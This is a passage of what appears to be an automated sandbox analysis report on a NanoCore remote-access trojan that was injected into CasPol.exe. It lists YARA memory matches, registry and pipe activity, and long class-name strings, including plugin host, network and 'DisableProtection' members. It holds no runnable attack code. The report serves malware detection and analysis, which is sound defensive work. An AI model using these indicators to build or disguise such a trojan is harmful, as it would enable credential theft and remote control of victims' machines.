Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EAD24 CreateNamedPipeW, 10_2_089EAD24

Stealing of Sensitive Information

Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality

Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CasPol.exe, 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR